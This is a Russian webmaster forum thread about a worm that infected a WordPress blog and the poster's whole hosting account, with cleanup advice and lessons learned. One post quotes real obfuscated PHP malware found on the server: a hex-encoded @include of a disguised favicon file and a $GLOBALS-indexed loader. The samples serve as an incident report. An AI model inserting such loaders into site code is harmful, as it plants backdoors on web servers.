Отправлено 12 Сентябрь 2017 - 13:45

Ещё есть сайты у вас на этом аккаунте хостинга? Возможно, взломан не сайт, а аккаунт на хостинге, и изменения внесены и выше корневой директории.

 

Да сайты на этом акке есть. Пока вроде работают. Хотя я пароли сразу же все сменил, все же есть шанс наверно что бяку засунули. Надо наверно антивирем все файлы прогнать...


  • 0

Очень много полезной информации, о том где взять трафик, и как на этом заработать. Другие это продают, я даю бесплатно: http://khabirov.com

 

Сотни тысяч ключевых слов для привлечения трафика здесь!


#15 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Админ

  • Администрация
  • 5 719 сообщений
2 662
Очень хороший
  • Пол:Мужчина

Отправлено 12 Сентябрь 2017 - 17:18

Хостеру писали? Бекапы есть?
  • 0

За возрождение нравственности в СМИ
Рекомендовано к изучению: Правила форума
Совершенству нет предела: как цитировать, как копипастить, как вставлять картинки

Кто счастлив, тот и прав. (Л. Н. Толстой)


#16 HRuust

HRuust

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 378 сообщений
49
Очень хороший
  • Страна, Город:
    Стерлитамак
  • Пол:Мужчина

Отправлено 12 Сентябрь 2017 - 17:30

Хостеру писали? Бекапы есть?

 

Хостеру не писал, есть только бекап БД. Мне наш Обществовед посоветовал специалиста - он уже 2 часа трясет и файлы и БД и пока не может понять, там непонятный код во многих файлах. Походу там заразы как блох на барбоске.

 

p.s Если у человека получится и по итогу лечения получится кейс, то выложу его в данной теме


  • 0

Очень много полезной информации, о том где взять трафик, и как на этом заработать. Другие это продают, я даю бесплатно: http://khabirov.com

 

Сотни тысяч ключевых слов для привлечения трафика здесь!


#17 HRuust

HRuust

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 378 сообщений
49
Очень хороший
  • Страна, Город:
    Стерлитамак
  • Пол:Мужчина

Отправлено 12 Сентябрь 2017 - 19:26

Значит так, Александр по рекомендации Обществоведа оказался реально хорошим специалистом. Разобрал и файлы и БД по косточкам, нашел левый код во многих файлах и запустил сайт в итоге. Сейчас канеш дефолтная тема, но это решаемо, главное блог работает. Еще попробую айболитом прогнать позже файлы.

 

Я его спросил что он сделал, он ответил:

 

 Александр

Прежде всего, я удалил все лишние .htaccess из всех директорий вашего сайта, очистил .php файлы от постороннего кода. Ну и под финал, перезаписал файлы оригинальными из ядра CMS

 

 Рустем

а посторонний код как был виден?

 

 Александр

редиректы в .htaccess и повторяющиеся строчки кода, окторых нет в оригинальных файлах. Так сложно объяснить)

*которых

 

 Рустем

можно было просто заменить на оригинальные php или очистка нужна была? и еще в файлах плагинов тоже был левый код?

 

Александр

простая замена не решила бы проблему полностью. нужно было избавиться от лишних файлов

 

Кейс по информативности не ахти какой получился, но выводы полезные сделать можно каждому:

 

1. Никогда не ставь бесплатные шаблоны тем из непроверенных источников (до этого всегда юзал платные, первый раз попробовал бесплатную тему, может оттуда зверь)

2. Не бери никаких плагинов в подарок от незнакомых людей и с неофициальных сайтов (Однажды я получил платный дорогой плагин бесплатно, от человека в итоге оказавшегося личным врагом и чуть не потерял свой сайт год с лишним назад).

3. Делай периодический бекап БД

4. Делай периодический бекап файлов сайта (на многих хостах это сделать легко - прям из админки зажать файлы в зип и скачать архив). Я же уже давненько не делал этого, уже давно бы все вылечил.

 

Кстати (не реклама) , адрес страницы ВК Александра: https://vk.com/orekhovalexander услуга была очень недорогая, мало ли у кого что вылезет.

 

Тему можно закрыть, или перенести куда нибудь в безопасность для обсуждения

 


Сообщение отредактировал HRuust: 12 Сентябрь 2017 - 19:28

  • 2

Очень много полезной информации, о том где взять трафик, и как на этом заработать. Другие это продают, я даю бесплатно: http://khabirov.com

 

Сотни тысяч ключевых слов для привлечения трафика здесь!


#18 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Админ

  • Администрация
  • 5 719 сообщений
2 662
Очень хороший
  • Пол:Мужчина

Отправлено 13 Сентябрь 2017 - 06:43

Хотя я пароли сразу же все сменил


От FTP пароль поменяли? А от почты, куда приходят данные от хостера?
  • 0

За возрождение нравственности в СМИ
Рекомендовано к изучению: Правила форума
Совершенству нет предела: как цитировать, как копипастить, как вставлять картинки

Кто счастлив, тот и прав. (Л. Н. Толстой)


#19 HRuust

HRuust

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 378 сообщений
49
Очень хороший
  • Страна, Город:
    Стерлитамак
  • Пол:Мужчина

Отправлено 19 Сентябрь 2017 - 04:35

Уфф вроде все вылечил, но это был жесткач. После лечения блога Александром, я попросил хостера проверить весь аккаунт на вирусы и ТП по любому моему запросу прогоняла всю файловую систему Айболитом (раз 10 наверно, со счета сбился). Благо техподдержка моего хостинга просто золотая - более 15 минут не на один вопрос не отвечают и работают оперативно.

 

 

 

Прогой (4) не пользовался, поэтому ничего сказать не могу... Если опробуете, HRuust, отпишитесь, как она.

 

Прога обалденная и бесплатная находится тут

 

По итогу оказалось что весь мой акк на хостинге - 13 сайтов и туева хуча директорий оказались заражены. Это был какой-то червь. Он проник в каждую директорию (и блог просто оказался одним из зараженных сайтов) и:

-прописал там свой htaccess со своим кодом если в папке имелся родной файл htaccess то его изменял под себя (в шапку добавил вирусный код).

- при наличии index.php в шапку добавлял свой вирусный код

- при наличии стартового файла index.html, переименовывал его в index.html.bak.bak не изменяя содержимое и вставлял свой index.php с содержимым:

<?php



/*62db3*/

@include "\x2fv\x61r\x2fw\x77w\x2fw\x65b\x69n\x61r\x62/\x64a\x74a\x2fw\x77w\x2fm\x61x\x2ds\x61l\x652\x34.\x72u\x2fg\x6fr\x6ba\x2ff\x61v\x69c\x6fn\x5f1\x32d\x616\x35.\x69c\x6f";

/*62db3*/


echo file_get_contents('index.html.bak.bak');

- добавил какие то другие php файлы с рандомным именем в некоторые папки (может не успел полностью размножится в этом виде хз) 

 

кусок кода одного файла

<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['zde7988'] = "\x60\x5e\x4a\x58\x52\x57\x42\x4e\x30\x51\x2a\x2c\x34\x76\x4b\x32\x59\x6b\x37\x38\x22\x44\x29\x2d\x78\x6e\x36\x27\x9\x6d\x79\x2b\xa\x4f\x3a\x66\x4d\x64\x7d\x5f\x23\x70\x7c\x24\x77\x4c\x54\x5d\x6f\x5a\x55\x6a\x50\x72\x7e\x40\x53\x3d\x49\x31\x43\x48\x3c\x26\x2e\x5b\x74\x67\x33\x25\x73\x28\xd\x45\x3f\x63\x47\x68\x41\x3e\x71\x20\x35\x6c\x56\x7a\x39\x46\x75\x7b\x61\x2f\x69\x21\x5c\x62\x65\x3b";
$GLOBALS[$GLOBALS['zde7988'][77].$GLOBALS['zde7988'][68].$GLOBALS['zde7988'][96].$GLOBALS['zde7988'][15]] = $GLOBALS['zde7988'][75].$GLOBALS['zde7988'][77].$GLOBALS['zde7988'][53];
$GLOBALS[$GLOBALS['zde7988'][24].$GLOBALS['zde7988'][86].$GLOBALS['zde7988'][19].$GLOBALS['zde7988'][59].$GLOBALS['zde7988'][82].$GLOBALS['zde7988'][59].$GLOBALS['zde7988'][15]] = $GLOBALS['zde7988'][48].$GLOBALS['zde7988'][53].$GLOBALS['zde7988'][37];
$GLOBALS[$GLOBALS['zde7988'][70].$GLOBALS['zde7988'][90].$GLOBALS['zde7988'][12].$GLOBALS['zde7988'][82].$GLOBALS['zde7988'][59].$GLOBALS['zde7988'][75].$GLOBALS['zde7988'][68]] = $GLOBALS['zde7988'][70].$GLOBALS['zde7988'][66].$GLOBALS['zde7988'][53].$GLOBALS['zde7988'][83].$GLOBALS['zde7988'][96].$GLOBALS['zde7988'][25];

- добавил какие то логовые txt файлы.

 

По итогу 3 суток копания в папках хостинга (благо до домашнего компа добрался). Где тотал-командером а где руками все вычищал и много раз прогонял айболитом пока отчет о проверке нормальный не получил.

 

Вопрос к знатокам - как этот сцука червь смог файлы изменить? У меня на папки стоят права доступа 755, а на файлы 644 (правда на index.html 755 атрибуты стоят).

 

Поменял на всякий пожарный все пароли (билинг хостинга, админка хостинга), пароли к БД.

По блогу тоже изменения внес для безопасности и потер кукисы у пользователей. Также новую платную тему поставил а старые все удалил.

 

UPD: Еще неприятные потери. Органический трафик всех сайтов с поисковиков упал практически до нуля - хотя в гугл и яндекс вебмастер про заражение ничего не говорится. Очень надеюсь что к начальным позициям в выдаче вернусь когда нибудь. 

 

p.s Всего месяц меня дома не было - 3/14здец  :mad:  :mad:  :mad:


От FTP пароль поменяли? А от почты, куда приходят данные от хостера?

 

Поменял


Сообщение отредактировал HRuust: 19 Сентябрь 2017 - 04:32

  • 2

Очень много полезной информации, о том где взять трафик, и как на этом заработать. Другие это продают, я даю бесплатно: http://khabirov.com

 

Сотни тысяч ключевых слов для привлечения трафика здесь!


#20 трай

трай

    Свой человек

  • Киберсанты
  • PipPipPipPipPip
  • 716 сообщений
226
Очень хороший
  • Пол:Мужчина

Отправлено 19 Сентябрь 2017 - 09:41

Прога обалденная и бесплатная находится тут
Таки да. У автора проги есть свой паблик в вк(много полезной инфы) - https://vk.com/siteprotect

 

Еще источник инфы - https://searchengine...splay.php?f=113

 

П.С. HRuust, рекомендую еще на всякий случай комп проверить прогой Malwarebytes - https://ru.malwarebytes.com/ Отлично дополняет антивирь..


  • 1





Темы с аналогичным тегами вордпресс, взлом сайта, проблемы вордпресс

Количество пользователей, читающих эту тему: 2

0 пользователей, 2 гостей, 0 скрытых пользователей